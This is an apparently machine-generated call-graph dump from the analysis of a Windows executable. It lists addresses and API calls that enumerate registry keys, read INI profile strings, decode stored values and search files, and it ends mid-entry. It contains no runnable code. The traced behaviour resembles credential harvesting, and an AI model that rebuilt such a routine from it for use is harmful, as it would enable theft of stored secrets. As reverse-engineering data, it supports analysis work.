4069d2 strlen strlen _memicmp 6115->6116 6116->6111 6116->6115 6118 4036e2 6117->6118 6119 4037ac 6117->6119 6340 40e906 UuidFromStringA UuidFromStringA 6118->6340 6119->6041 6122 4036fd strchr 6122->6119 6123 403717 6122->6123 6344 4021d8 6123->6344 6126 403770 sprintf 6127 40378b strcpy 6126->6127 6347 402407 _mbscmp 6127->6347 6130 40755d 6129->6130 6384 40724c 11 API calls 6130->6384 6134 40757b 6135 403ce1 6134->6135 6136 407586 memset 6134->6136 6147 40719c 6135->6147 6387 40ec05 RegEnumKeyExA 6136->6387 6138 4075b2 6139 40764d RegCloseKey 6138->6139 6141 4075d7 memset 6138->6141 6388 40eb3f RegOpenKeyExA 6138->6388 6405 40ec05 RegEnumKeyExA 6138->6405 6139->6135 6389 40eb80 RegQueryValueExA 6141->6389 6144 40760f 6390 407406 strlen 6144->6390 6407 40eb3f RegOpenKeyExA 6147->6407 6149 4071be 6150 403ced 6149->6150 6151 4071c5 memset 6149->6151 6159 40765b 6150->6159 6408 40ec05 RegEnumKeyExA 6151->6408 6153 40723e RegCloseKey 6153->6150 6155 4071ee 6155->6153 6409 40eb3f RegOpenKeyExA 6155->6409 6410 40706c memset 6155->6410 6426 40ec05 RegEnumKeyExA 6155->6426 6431 404647 6159->6431 6161 407863 6439 4046c2 6161->6439 6165 4076b2 wcslen 6165->6161 6169 4076e5 6165->6169 6166 4076ef wcsncmp 6166->6169 6168 4047a0 3 API calls 6168->6169 6169->6161 6169->6166 6169->6168 6170 4047f1 FreeLibrary 6169->6170 6171 407787 memset 6169->6171 6172 4077b4 memcpy wcschr 6169->6172 6173 407837 LocalFree 6169->6173 6442 4046d7 strcpy 6169->6442 6170->6169 6171->6169 6171->6172 6172->6169 6173->6169 6174 40eb3f RegOpenKeyExA 6174->6054 6175->6058 6443 40eb3f RegOpenKeyExA 6176->6443 6178 402c61 6179 402d8c 6178->6179 6180 402c6e memset 6178->6180 6179->6063 6444 40ec05 RegEnumKeyExA 6180->6444 6182 402d83 RegCloseKey 6182->6179 6183 40ebc1 3 API calls 6184 402ccb memset sprintf 6183->6184 6445 40eb3f RegOpenKeyExA 6184->6445 6186 402d0f 6187 402d21 sprintf 6186->6187 6188 402bb8 37 API calls 6186->6188 6446 40eb3f RegOpenKeyExA 6187->6446 6188->6187 6190 402bb8 37 API calls 6192 402c99 6190->6192 6192->6182 6192->6183 6192->6190 6193 402d81 6192->6193 6447 40ec05 RegEnumKeyExA 6192->6447 6193->6182 6194->6066 6195->6070 6198 40e8b9 6196->6198 6197 40e894 FreeLibrary 6199 403dce 6197->6199 6198->6197 6199->6075 6448 40eb3f RegOpenKeyExA 6200->6448 6202 402fe0 6203 403113 6202->6203 6204 402fed memset 6202->6204 6203->6079 6449 40ec05 RegEnumKeyExA 6204->6449 6206 403109 RegCloseKey 6206->6203 6207 40ebc1 3 API calls 6208 40303f memset sprintf 6207->6208 6450 40eb3f RegOpenKeyExA 6208->6450 6210 403089 memset 6451 40ec05 RegEnumKeyExA 6210->6451 6212 4030e0 RegCloseKey 6214 40301a 6212->6214 6214->6206 6214->6207 6214->6210 6214->6212 6215 40ec05 RegEnumKeyExA 6214->6215 6452 402d9a 6214->6452 6215->6214 6217 403390 6216->6217 6218 4032bc 6216->6218 6231 4034cb memset memset 6217->6231 6219 4021d8 memset 6218->6219 6220 4032c8 6219->6220 6504 40314d 6220->6504 6223 4032df memset GetPrivateProfileSectionA 6223->6217 6228 403316 6223->6228 6224 402407 16 API calls 6224->6223 6225 403382 strlen 6225->6217 6225->6228 6226 4021d8 memset 6227 403337 strchr 6226->6227 6227->6228 6228->6217 6228->6225 6228->6226 6229 40314d 5 API calls 6228->6229 6230 402407 16 API calls 6228->6230 6229->6228 6230->6228 6232 40ebc1 3 API calls 6231->6232 6233 403526 6232->6233 6234 40352d strcpy 6233->6234 6238 403566 6233->6238 6235 405f1f 2 API calls 6234->6235 6236 40354c strcat 6235->6236 6530 4033d7 6236->6530 6239 40396c 6238->6239 6563 4046d7 strcpy 6239->6563 6241 4039b4 RegOpenKeyExA 6244 403992 6241->6244 6242 4039e6 RegOpenKeyExA 6242->6244 6244->6241 6244->6242 6247 403a2a 6244->6247 6564 40d5db 6244->6564 6580 40d4a6 RegQueryValueExA 6244->6580 6595 4038cf 6244->6595 6248 4047f1 FreeLibrary 6247->6248 6249 403a36 6248->6249 6250 4037b1 memset memset 6249->6250 6612 410f79 memset 6250->6612 6253 4038c9 6253->6089 6328 40d37a 6253->6328 6254 4021d8 memset 6255 403815 6254->6255 6256 4060d0 2 API calls 6255->6256 6257 40382a 6256->6257 6258 4060d0 2 API calls 6257->6258 6259 40383c strchr 6258->6259 6260 40386b strcpy 6259->6260 6261 40387e strlen 6259->6261 6262 4038a6 strcpy 6260->6262 6261->6262 6263 40388b sprintf 6261->6263 6264 402407 16 API calls 6262->6264 6263->6262 6264->6253 6266 4118a0 6265->6266 6267 40da09 RegOpenKeyExA 6266->6267 6268 403e70 6267->6268 6269 40da34 RegOpenKeyExA 6267->6269 6279 40d865 6268->6279 6270 40db26 RegCloseKey 6269->6270 6271 40da4e RegQueryValueExA 6269->6271 6270->6268 6272 40db1c RegCloseKey 6271->6272 6273 40da7d 6271->6273 6272->6270 6274 4047a0 3 API calls 6273->6274 6275 40da8a 6274->6275 6275->6272 6276 40db12 LocalFree 6275->6276 6277 40dad6 memcpy memcpy 6275->6277 6276->6272 6699 40d6fb 6277->6699 6280 406278 GetVersionExA 6279->6280 6281 40d886 6280->6281 6282 404647 7 API calls 6281->6282 6290 40d8a2 6282->6290 6283 4046c2 FreeLibrary 6284 403e76 6283->6284 6291 410d1b memset 6284->6291 6285 40d9df 6285->6283 6286 40d90c memset WideCharToMultiByte 6287 40d93c _strnicmp 6286->6287 6286->6290 6288 40d954 WideCharToMultiByte 6287->6288 6287->6290 6289 40d981 WideCharToMultiByte 6288->6289 6288->6290 6289->6290 6290->6285 6290->6286 6292 40ee59 9 API calls 6291->6292 6293 410d5a 6292->6293 6713 406734 strlen strlen 6293->6713 6298 40ee59 9 API calls 6299 410d81 6298->6299 6300 406734 3 API calls 6299->6300 6301 410d8b 6300->6301 6302 410c43 65 API calls 6301->6302 6303 410d97 memset memset 6302->6303 6304 40ebc1 3 API calls 6303->6304 6305 410dea ExpandEnvironmentStringsA strlen 6304->6305 6306 410e25 _stricmp 6305->6306 6307 410e16 6305->6307 6308 403e82 6306->6308 6309 410e3d 6306->6309 6307->6306 6308->5843 6310 410c43 65 API calls 6309->6310 6310->6308 6842 40ec05 RegEnumKeyExA 6311->6842 6313 402c3a RegCloseKey 6313->6055 6318 402bec 6318->6313 6843 40eb3f RegOpenKeyExA 6318->6843 6844 402606 6318->6844 6858 40ec05 RegEnumKeyExA 6318->6858 6881 40ec05 RegEnumKeyExA 6319->6881 6321 402b3f 6322 402ba2 RegCloseKey 6321->6322 6323 4060d0 2 API calls 6321->6323 6327 402b9f 6321->6327 6882 40eb3f RegOpenKeyExA 6321->6882 6883 402a84 memset 6321->6883 6891 40ec05 RegEnumKeyExA 6321->6891 6322->6067 6323->6321 6327->6322 6329 406e68 9 API calls 6328->6329 6331 40d3b3 6329->6331 6330 406ec3 9 API calls 6330->6331 6331->6330 6332 40d425 6331->6332 6333 406e2d 2 API calls 6331->6333 6336 40d37a 143 API calls 6331->6336 6337 40d3df _stricmp 6331->6337 6926 40614b GetFileAttributesA 6331->6926 6927 40d1ec 6331->6927 6334 406f5b FindClose 6332->6334 6333->6331 6335 40d42e 6334->6335 6335->6089 6336->6331 6337->6331 6341 4036f5 6340->6341 6342 40e930 6340->6342 6341->6119 6341->6122 6342->6341 6343 40e961 memcpy CoTaskMemFree 6342->6343 6343->6341 6354 406549 memset 6344->6354 6346 4021e9 strcpy strcpy strlen 6346->6126 6346->6127 6348 402432 6347->6348 6352 402426 6347->6352 6355 401a50 strlen 6348->6355 6367 408f63 6352->6367 6354->6346 6356 401bec 6355->6356 6363 401aa4 6355->6363 6357 401c39 log log 6356->6357 6358 401c7f 6356->6358 6360 401c7b _mbsicmp 6357->6360 6361 401c71 free 6357->6361 6359 401c85 free 6358->6359 6358->6360 6359->6360 6360->6352 6361->6360 6363->6356 6364 401b51 abs 6363->6364 6365 4045e8 4 API calls 6363->6365 6378 4045e8 6363->6378 6364->6363 6366 401b87 abs 6365->6366 6366->6363 6368 408f70 6367->6368 6369 408f8b 6367->6369 6368->6369 6370 408fb8 memcpy 6368->6370 6371 408fd4 6369->6371 6372 408faf free 6369->6372 6376 402465 6370->6376 6373 4060fa 3 API calls 6371->6373 6374 408fe4 memcpy 6372->6374 6373->6374 6374->6376 6376->6119 6379 4045f3 6378->6379 6383 404611 6378->6383 6380 404604 6379->6380 6381 4045fb free 6379->6381 6382 4060fa 3 API calls 6380->6382 6381->6383 6382->6383 6383->6363 6385 407397 6384->6385 6386 40eb3f RegOpenKeyExA 6385->6386 6386->6134 6387->6138 6388->6138 6389->6144 6391 407424 6390->6391 6392 407546 RegCloseKey 6391->6392 6393 407438 memset 6391->6393 6392->6138 6394 407469 6393->6394 6406 4046d7 strcpy 6394->6406 6396 4074a6 6397 4047a0 3 API calls 6396->6397 6400 4074ab 6397->6400 6398 40753b 6399 4047f1 FreeLibrary 6398->6399 6399->6392 6400->6398 6401 4074f1 memcpy 6400->6401 6402 4060d0 2 API calls 6401->6402 6403 407525 LocalFree 6402->6403 6403->6398 6405->6138 6406->6396 6407->6149 6408->6155 6409->6155 6427 40eba3 RegQueryValueExA 6410->6427 6412 4070c9 6413 407195 RegCloseKey 6412->6413 6428 4046d7 strcpy 6412->6428 6413->6155 6415 4070df 6416 4047a0 3 API calls 6415->6416 6417 4070e4 6416->6417 6419 40710f WideCharToMultiByte LocalFree 6417->6419 6425 40717d 6417->6425 6418 4047f1 FreeLibrary 6418->6413 6429 40eb80 RegQueryValueExA 6419->6429 6421 407159 6430 40eb80 RegQueryValueExA 6421->6430 6423 40716f 6424 4060d0 2 API calls 6423->6424 6424->6425 6425->6418 6426->6155 6427->6412 6428->6415 6429->6421 6430->6423 6432 4046c2 FreeLibrary 6431->6432 6433 40464f LoadLibraryA 6432->6433 6434 404660 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 6433->6434 6435 4046bd 6433->6435 6436 4046a9 6434->6436 6435->6161 6435->6165 6437 4046af 6436->6437 6438 4046c2 FreeLibrary 6436->6438 6437->6435 6438->6435 6440 403cf9 6439->6440 6441 4046c8 FreeLibrary 6439->6441 6440->6174 6441->6440 6442->6169 6443->6178 6444->6192 6445->6186 6446->6192 6447->6192 6448->6202 6449->6214 6450->6214 6451->6214 6491 40eb3f RegOpenKeyExA 6452->6491 6454 402db2 6455 402fbe 6454->6455 6456 4021d8 memset 6454->6456 6455->6214 6457 402dd2 6456->6457 6458 4021d8 memset 6457->6458 6459 402ddd 6458->6459 6492 40eb80 RegQueryValueExA 6459->6492 6461 402e19 6493 40eb80 RegQueryValueExA 6461->6493 6463 402e2f 6494 40eb80 RegQueryValueExA 6463->6494 6465 402e45 6495 40eb80 RegQueryValueExA 6465->6495 6467 402e5b 6496 40eb59 RegQueryValueExA 6467->6496 6469 402e6c 6497 40eb59 RegQueryValueExA 6469->6497 6471 402e7d 6498 40eba3 RegQueryValueExA 6471->6498 6473 402e98 strcpy strcpy 6499 40eb80 RegQueryValueExA 6473->6499 6476 402edf 6500 40eb80 RegQueryValueExA 6476->6500 6478 402ef5 6501 40eb59 RegQueryValueExA 6478->6501 6480 402f09 6502 40eb59 RegQueryValueExA 6480->6502 6482 402f1d 6503 40eba3 RegQueryValueExA 6482->6503 6484 402f38 strcpy strcpy 6486 402f6e 6484->6486 6487 402f8e 6486->6487 6488 402407 16 API calls 6486->6488 6489 402fb5 RegCloseKey 6487->6489 6490 402407 16 API calls 6487->6490 6488->6487 6489->6455 6490->6489 6491->6454 6492->6461 6493->6463 6494->6465 6495->6467 6496->6469 6497->6471 6498->6473 6499->6476 6500->6478 6501->6480 6502->6482 6503->6484 6525 40311f 6504->6525 6506 403190 6507 40311f GetPrivateProfileStringA 6506->6507 6508 4031bf 6507->6508 6509 40311f GetPrivateProfileStringA 6508->6509 6510 4031d8 6509->6510 6511 40311f GetPrivateProfileStringA 6510->6511 6512 4031ee 6511->6512 6513 40311f GetPrivateProfileStringA 6512->6513 6514 403207 6513->6514 6515 40311f GetPrivateProfileStringA 6514->6515 6516 40321f 6515->6516 6518 40327a 6516->6518 6528 401d5a strlen 6516->6528 6518->6223 6518->6224 6519 403240 6519->6518 6520 40311f GetPrivateProfileStringA 6519->6520 6521 40325a 6520->6521 6521->6518 6522 40325f strchr 6521->6522 6522->6518 6523 403270 6522->6523 6524 4060d0 2 API calls 6523->6524 6524->6518 6526 403139 GetPrivateProfileStringA 6525->6526 6526->6506 6529 401d75 6528->6529 6529->6519 6531 4021d8 memset 6530->6531 6532 4033ec 6531->6532 6533 4021d8 memset 6532->6533 6534 4033f7 6533->6534 6555 403397 GetPrivateProfileStringA 6534->6555 6536 403428 6556 403397 GetPrivateProfileStringA 6536->6556 6538 40343a 6557 403397 GetPrivateProfileStringA 6538->6557 6540 40344c 6558 403397 GetPrivateProfileStringA 6540->6558 6542 40345e 6559 403397 GetPrivateProfileStringA 6542->6559 6544 403470 6560 403397 GetPrivateProfileStringA 6544->6560 6546 403482 6548 4034a4 6546->6548 6561 4033b8 strlen 6546->6561 6547 4034c6 6547->6238 6548->6547 6551 4033b8 strlen 6548->6551 6553 4034b8 6551->6553 6552 402407 16 API calls 6552->6548 6554 402407 16 API calls 6553->6554 6554->6547 6555->6536 6556->6538 6557->6540 6558->6542 6559->6544 6560->6546 6562 4033c5 6561->6562 6562->6552 6563->6244 6608 4046d7 strcpy 6564->6608 6566 40d5f3 6567 404647 7 API calls 6566->6567 6568 40d601 6567->6568 6569 4047a0 3 API calls 6568->6569 6575 40d6db 6568->6575 6571 40d60e 6569->6571 6570 4046c2 FreeLibrary 6572 40d6ea 6570->6572 6571->6575 6576 40d690 WideCharToMultiByte 6571->6576 6573 4047f1 FreeLibrary 6572->6573 6574 40d6f5 6573->6574 6574->6244 6575->6570 6577 40d6b1 strlen 6576->6577 6578 40d6d2 LocalFree 6576->6578 6577->6578 6579 40d6c1 strcpy 6577->6579 6578->6575 6579->6578 6581 40d4e3 6580->6581 6582 40d5c7 RegCloseKey 6580->6582 6581->6582 6583 40d569 6581->6583 6609 4046d7 strcpy 6581->6609 6582->6244 6583->6582 6610 401380 strlen 6583->6610 6585 40d504 6587 4047a0 3 API calls 6585->6587 6592 40d509 6587->6592 6588 40d593 RegQueryValueExA 6588->6582 6589 40d5b4 6588->6589 6589->6582 6590 40d55e 6591 4047f1 FreeLibrary 6590->6591 6591->6583 6592->6590 6593 40d555 LocalFree 6592->6593 6594 40d539 memcpy 6592->6594 6593->6590 6594->6593 6596 4021d8 memset 6595->6596 6597 4038e6 6596->6597 6598 4060d0 2 API calls 6597->6598 6599 403900 6598->6599 6600 4060d0 2 API calls 6599->6600 6601 40390d 6600->6601 6602 4060d0 2 API calls 6601->6602 6603 40391a strchr 6602->6603 6604 40392b 6603->6604 6605 40392e strcpy 6603->6605 6604->6605 6606 402407 16 API calls 6605->6606 6607 403965 6606->6607 6607->6244 6608->6566 6609->6585 6611 40139f 6610->6611 6611->6588 6623 40eb3f RegOpenKeyExA 6612->6623 6614 410fb3 6615 403801 6614->6615 6624 40eb80 RegQueryValueExA 6614->6624 6615->6253 6615->6254 6617 410fcc 6618 411004 RegCloseKey 6617->6618 6625 40eb80 RegQueryValueExA 6617->6625 6618->6615 6620 410fe9 6620->6618 6626 4112a1 6620->6626 6623->6614 6624->6617 6625->6620 6638 410e8a strlen 6626->6638 6628 4112bb 6631 4112dd 6628->6631 6640 411015 6628->6640 6632 411002 6631->6632 6669 411366 memset memset memset 6631->6669 6632->6618 6633 4112f8 6633->6632 6634 411318 memset 6633->6634 6635 411015 21 API calls 6634->6635 6636 411344 6635->6636 6636->6632 6637 41134e strcpy 6636->6637 6637->6632 6639 410ea9 6638->6639 6639->6628 6641 4118a0 6640->6641 6642 411022 memset 6641->6642 6643 410e8a strlen 6642->6643 6644 411050 strlen 6643->6644 6645 411069 6644->6645 6646 411298 6644->6646 6645->6646 6647 411071 memset memset memset memset 6645->6647 6646->6631 6648 4110eb 6647->6648 6684 40bc6d 6648->6684 6650 4110f9 6691 40bd0b 6650->6691 6652 411108 memcpy 6653 411124 6652->6653 6654 40bc6d 3 API calls 6653->6654 6655 411135 6654->6655 6656 40bd0b 5 API calls 6655->6656 6657 411141 memcpy memcpy 6656->6657 6658 41116f 6657->6658 6659 40bc6d 3 API calls 6658->6659 6660 411180 6659->6660 6661 40bd0b 5 API calls 6660->6661 6662 41118c 6661->6662 6663 411229 strcpy 6662->6663 6664 411247 6663->6664 6665 40bc6d 3 API calls 6664->6665 6666 411255 6665->6666 6667 40bd0b 5 API calls 6666->6667 6668 411261 memcpy memcpy 6667->6668 6668->6646 6670 410e8a strlen 6669->6670 6671 4113ca strlen 6670->6671 6672 4113e2 6671->6672 6683 411471 6671->6683 6673 4113ea memcpy memcpy 6672->6673 6672->6683 6674 411418 6673->6674 6675 40bc6d 3 API calls 6674->6675 6676 41142a 6675->6676 6677 40bd0b 5 API calls 6676->6677 6678 411439 memcpy 6677->6678 6679 411457 6678->6679 6680 40bc6d 3 API calls 6679->6680 6681 411468 6680->6681 6682 40bd0b 5 API calls 6681->6682 6682->6683 6683->6633 6685 40bc84 6684->6685 6686 40bcc2 6685->6686 6687 40bca4 memcpy 6685->6687 6688 40bcab memcpy 6685->6688 6686->6687 6690 40bcd1 memcpy 6686->6690 6687->6650 6688->6686 6690->6686 6692 40bd25 memset 6691->6692 6693 40bd4b memset 6691->6693 6698 40bd8a 6692->6698 6695 40bd5a 6693->6695 6697 40bd70 memcpy memset 6695->6697 6696 40bd3b memset 6696->6695 6697->6652 6698->6696 6700 4118a0 6699->6700 6701 40d708 RegOpenKeyExA 6700->6701 6702 40d85e 6701->6702 6703 40d72f memset 6701->6703 6702->6276 6704 40d844 RegEnumKeyA 6703->6704 6705 40d855 RegCloseKey 6704->6705 6706 40d75c RegOpenKeyExA 6704->6706 6705->6702 6707 40d77a RegQueryValueExA 6706->6707 6709 40d7a7 6706->6709 6708 40d82d RegCloseKey 6707->6708 6707->6709 6708->6709 6709->6704 6709->6708 6710 4060d0 2 API calls 6709->6710 6711 40d7fd WideCharToMultiByte 6710->6711 6712 40d822 LocalFree 6711->6712 6712->6708 6714 406751 strcat 6713->6714 6715 40675f 6713->6715 6714->6715 6716 410c43 6715->6716 6733 406e68 6716->6733 6718 410c7e 6720 410ca5 6718->6720 6722 410c89 6718->6722 6741 406ec3 6718->6741 6721 406e68 9 API calls 6720->6721 6730 410cd1 6721->6730 6758 410bc7 6722->6758 6724 406ec3 9 API calls 6724->6730 6725 410cff 6755 406f5b 6725->6755 6729 406f5b FindClose 6731 410d15 6729->6731 6730->6724 6730->6725 6732 410c43 65 API calls 6730->6732 6751 406e2d 6730->6751 6731->6298 6732->6730 6734 406f5b FindClose 6733->6734 6735 406e75 6734->6735 6736 4060d0 2 API calls 6735->6736 6737 406e88 strlen strlen 6736->6737 6738 406eb5 6737->6738 6739 406eac 6737->6739 6738->6718 6740 4062ad 4 API calls 6739->6740 6740->6738 6742 406ece FindFirstFileA 6741->6742 6743 406eef FindNextFileA 6741->6743 6744 406f0a 6742->6744 6745 406f11 strlen strlen 6743->6745 6746 406f05 6743->6746 6744->6745 6748 406f4a 6744->6748 6745->6748 6749 406f41 6745->6749 6747 406f5b FindClose 6746->6747 6747->6744 6748->6718 6750 4062ad 4 API calls 6749->6750 6750->6748 6752 406e5f 6751->6752 6753 406e37 strcmp 6751->6753 6752->6730 6753->6752 6754 406e4e strcmp 6753->6754 6754->6752 6756 406f64 FindClose 6755->6756 6757 406f6e 6755->6757 6756->6757 6757->6729 6769 405ecb CreateFileA 6758->6769 6760 410bd2 6761 410bdb GetFileSize 6760->6761 6762 410c3f 6760->6762 6763 410c34 CloseHandle 6761->6763 6764 410bee ??2@YAPAXI SetFilePointer 6761->6764 6762->6718 6763->6762 6770 4066f6 ReadFile 6764->6770 6766 410c15 6771 410a8a 6766->6771 6769->6760 6770->6766 6772 4118a0 6771->6772 6773 410a97 wcslen ??2@YAPAXI WideCharToMultiByte 6772->6773 6786 40fe05 6773->6786 6775 410ad0 6776 410af0 strlen 6775->6776 6798 40ff76 6776->6798 6778 410b10 memcpy 6801 410081 6778->6801 6780 410b6e ??3@YAXPAX 6811 40feed 6780->6811 6782 4060d0 2 API calls 6782->6780 6829 406549 memset 6786->6829 6788 40fe18 ??2@YAPAXI 6789 40fe27 6788->6789 6790 40fe30 ??2@YAPAXI 6789->6790 6791 40fe42 6790->6791 6792 40fe4b ??2@YAPAXI 6791->6792 6793 40fe62 ??2@YAPAXI 6792->6793 6795 40fe86 ??2@YAPAXI 6793->6795 6797 40feaa 6795->6797 6797->6775 6799 40ff80 ??3@YAXPAX 6798->6799 6800 40ff8b ??2@YAPAXI 6798->6800 6799->6800 6800->6778 6830 406a4e free free 6801->6830 6803 4100b3 6831 406a4e free free 6803->6831 6805 410396 6805->6780 6805->6782 6806 406b25 4 API calls 6808 4100be 6806->6808 6807 40ffa2 19 API calls 6807->6808 6808->6805 6808->6806 6808->6807 6809 410217 memcpy 6808->6809 6832 40f808 6808->6832 6809->6808 6812 40fefa ??3@YAXPAX 6811->6812 6813 40ff05 6811->6813 6812->6813 6814 40ff1c 6813->6814 6815 406b5b free 6813->6815 6816 40ff32 6814->6816 6818 406b5b free 6814->6818 6817 40ff15 ??3@YAXPAX 6815->6817 6819 40ff48 6816->6819 6821 406b5b free 6816->6821 6817->6814 6820 40ff2b ??3@YAXPAX 6818->6820 6822 40ff5e 6819->6822 6840 406a4e free free 6819->6840 6820->6816 6824 40ff41 ??3@YAXPAX 6821->6824 6823 40ff74 ??3@YAXPAX 6822->6823 6841 406a4e free free 6822->6841 6823->6763 6824->6819 6827 40ff57 ??3@YAXPAX 6827->6822 6828 40ff6d ??3@YAXPAX 6828->6823 6829->6788 6830->6803 6831->6808 6833 40fde4 6832->6833 6835 40fbfd 6832->6835 6833->6808 6834 40fc23 strlen strncmp 6834->6835 6835->6833 6835->6834 6836 40fd60 strlen strncmp 6835->6836 6837 40fd33 memcpy 6835->6837 6838 40fcab memcpy atoi WideCharToMultiByte 6835->6838 6836->6835 6839 406512 strtoul 6837->6839 6838->6835 6839->6835 6840->6827 6841->6828 6842->6318 6843->6318 6845 4026a2 memset 6844->6845 6859 40eb80 RegQueryValueExA 6845->6859 6847 4026cb 6847->6845 6848 4021d8 memset 6847->6848 6849 4027c6 RegCloseKey 6847->6849 6850 4026e1 strcpy 6848->6850 6849->6318 6860 40eb80 RegQueryValueExA 6850->6860 6852 40eb80 RegQueryValueExA 6853 40271a 6852->6853 6853->6852 6854 40eb59 RegQueryValueExA 6853->6854 6861 40246c 6853->6861 6854->6853 6856 40279b strcpy 6857 402407 16 API calls 6856->6857 6857->6847 6858->6318 6859->6847 6860->6853 6873 40eba3 RegQueryValueExA 6861->6873 6863 4024a0 6864 4024d2 6863->6864 6865 40254b 6863->6865 6869 402599 6863->6869 6864->6865 6866 402534 6864->6866 6867 4024df memset 6864->6867 6865->6856 6870 40e988 5 API calls 6866->6870 6874 40e988 6867->6874 6869->6865 6872 4025d3 WideCharToMultiByte LocalFree 6869->6872 6870->6865 6872->6865 6873->6863 6875 40e9a0 UuidFromStringA 6874->6875 6876 40e9b4 UuidFromStringA 6874->6876 6877 40e9c6 UuidFromStringA 6875->6877 6876->6877 6878 40251c WideCharToMultiByte 6877->6878 6879 40e9cc 6877->6879 6878->6865 6879->6878 6880 40e9ff memcpy CoTaskMemFree 6879->6880 6880->6878 6881->6321 6882->6321 6892 40ec05 RegEnumKeyExA 6883->6892 6885 402afc RegCloseKey 6885->6321 6887 402ab7 6887->6885 6890 402afb 6887->6890 6893 40eb3f RegOpenKeyExA 6887->6893 6894 4029fb memset 6887->6894 6902 40ec05 RegEnumKeyExA 6887->6902 6890->6885 6891->6321 6892->6887 6893->6887 6903 40ec05 RegEnumKeyExA 6894->6903 6896 402a2f 6897 402a7a RegCloseKey 6896->6897 6904 40eb3f RegOpenKeyExA 6896->6904 6905 4027d0 6896->6905 6919 40ec05 RegEnumKeyExA 6896->6919 6897->6887 6902->6887 6903->6896 6904->6896 6906 40286c memset 6905->6906 6920 4029a7 6906->6920 6908 402894 6908->6906 6909 40299d RegCloseKey 6908->6909 6910 4021d8 memset 6908->6910 6909->6896 6911 4028a7 strcpy 6910->6911 6912 4029a7 2 API calls 6911->6912 6915 4028e3 6912->6915 6913 4029a7 WideCharToMultiByte RegQueryValueExA 6913->6915 6914 40eb59 RegQueryValueExA 6914->6915 6915->6913 6915->6914 6916 40246c 10 API calls 6915->6916 6917 402972 strcpy 6916->6917 6918 402407 16 API calls 6917->6918 6918->6908 6919->6896 6925 40eba3 RegQueryValueExA 6920->6925 6922 4029d2 6923 4029d9 WideCharToMultiByte 6922->6923 6924 4029ef 6922->6924 6923->6924 6924->6908 6925->6922 6926->6331 6955 406c2f 6927->6955 6929 40d205 6930 40d36c 6929->6930 6931 40462e free 6929->6931 6930->6331 6932 40d218 6931->6932 6966 4061ff strcpy strrchr 6932->6966 6937 40d240 strlen strlen 6939 40d260 6937->6939 6940 40d273 6937->6940 6938 40d27a memset strlen strlen 6941 40d2d4 6938->6941 6942 40d2bd 6938->6942 6943 4062ad 4 API calls 6939->6943 6940->6938 6945 40d2f6 6941->6945 6946 406c2f 9 API calls 6941->6946 6944 4062ad 4 API calls 6942->6944 6943->6940 6944->6941 6987 40614b GetFileAttributesA 6945->6987 6948 40d2ed 6946->6948 6948->6945 6978 40c475 memset 6948->6978 6949 40d302 6953 40d314 6949->6953 6988 40ce28 6949->6988 6952 40d32b _stricmp 6952->6953 6953->6930 6953->6952 6954 40d34c strcpy 6953->6954 6954->6953 7012 405ecb CreateFileA 6955->7012 6957 406c3c 6958 406c80 6957->6958 6959 406c44 GetFileSize 6957->6959 6958->6929 6960 406b5b free 6959->6960 6961 406c55 6960->6961 6962 406b25 4 API calls 6961->6962 6963 406c5e 6962->6963 7013 4066f6 ReadFile 6963->7013 6965 406c67 CloseHandle 6965->6958 6967 406218 6966->6967 6968 40c530 memset memset memset 6967->6968 6969 40c58c 6968->6969 7014 406900 6969->7014 6971 40c6ec 6971->6937 6971->6938 6972 406900 memcpy 6973 40c5a4 6972->6973 6973->6971 6973->6972 6974 4069d2 strlen strlen _memicmp 6973->6974 6975 40c634 memcpy 6973->6975 6976 40c677 memcpy 6973->6976 6974->6973 6977 40c69d memcpy 6975->6977 6976->6977 6977->6973 6979 40c4a8 6978->6979 6980 406900 memcpy 6979->6980 6981 40c4b4 _stricmp 6979->6981 6982 40c50e 6979->6982 6984 406a74 7 API calls 6979->6984 7018 406a4e free free 6979->7018 6980->6979 6981->6979 7019 406a4e free free 6982->7019 6984->6979 6985 40c526 6985->6945 6987->6949 6989 40ce35 6988->6989 7020 40deee memset 6989->7020 6991 40d1e5 6991->6953 6994 40d1d9 SetCurrentDirectoryA 6994->6991 6996 40ce8f memset memset MultiByteToWideChar WideCharToMultiByte 7009 40cf00 6996->7009 6997 40cf55 memset memset 6997->7009 6998 40d1ac 6998->6991 6998->6994 6999 40cfe5 strcpy 6999->7009 7000 40cff9 strcpy 7000->7009 7001 40d00f strcpy 7001->7009 7002 40d025 strcpy 7002->7009 7003 40d03b strcpy 7003->7009 7004 40d051 strcpy 7005 40d062 memset memset 7004->7005 7052 40cd27 7005->7052 7007 40cd27 3 API calls 7007->7009 7008 40d0d7 memset memset sprintf sprintf _stricmp 7008->7009 7010 40d14a _stricmp 7008->7010 7009->6997 7009->6998 7009->6999 7009->7000 7009->7001 7009->7002 7009->7003 7009->7004 7009->7005 7009->7007 7009->7008 7011 4060d0 strlen memcpy 7009->7011 7010->7009 7011->7009 7012->6957 7013->6965 7015 406917 7014->7015 7017 406913 7014->7017 7016 406942 memcpy 7015->7016 7015->7017 7016->7017 7017->6973 7018->6979 7019->6985 7021 40df2b 7020->7021 7022 40df1d 7020->7022 7024 40ce4d 7021->7024 7025 40df39 GetCurrentDirectoryA SetCurrentDirectoryA memset strlen strlen 7021->7025 7023 4060d0 2 API calls 7022->7023 7023->7021 7024->6991 7024->6998 7035 40f64b 7024->7035 7026 40df8a 7025->7026 7031 40dfa1 GetModuleHandleA 7025->7031 7027 4062ad 4 API calls 7026->7027 7027->7031 7029 40dfef 7 API calls 7029->7024 7030 40dfbf LoadLibraryExA 7030->7029 7032 40dfd7 7030->7032 7031->7029 7031->7030 7061 40dea9 GetModuleHandleA GetModuleHandleA GetModuleHandleA 7032->7061 7036 40f661 memset 7035->7036 7047 40ce87 7035->7047 7037 40f694 7036->7037 7038 40f687 strcpy 7036->7038 7068 40f435 memset memset 7037->7068 7039 40f699 7038->7039 7041 40f741 GetModuleHandleA 7039->7041 7042 40f6a5 memset strcpy strcat 7039->7042 7044 40f754 LoadLibraryA 7041->7044 7045 40f75b 7041->7045 7094 40614b GetFileAttributesA 7042->7094 7044->7045 7046 40f769 9 API calls 7045->7046 7045->7047 7046->7047 7047->6996 7047->6998 7048 40f6ed 7049 40f6f4 strcpy strcat 7048->7049 7050 40f71b GetModuleHandleA 7048->7050 7049->7050 7050->7045 7051 40f72f LoadLibraryExA 7050->7051 7051->7045 7053 40cd47 7052->7053 7058 40cd58 7052->7058 7054 40cd64 memset 7053->7054 7055 40cd4b 7053->7055 7057 401380 strlen 7054->7057 7056 401380 strlen 7055->7056 7056->7058 7059 40cd90 7057->7059 7058->7009 7059->7058 7060 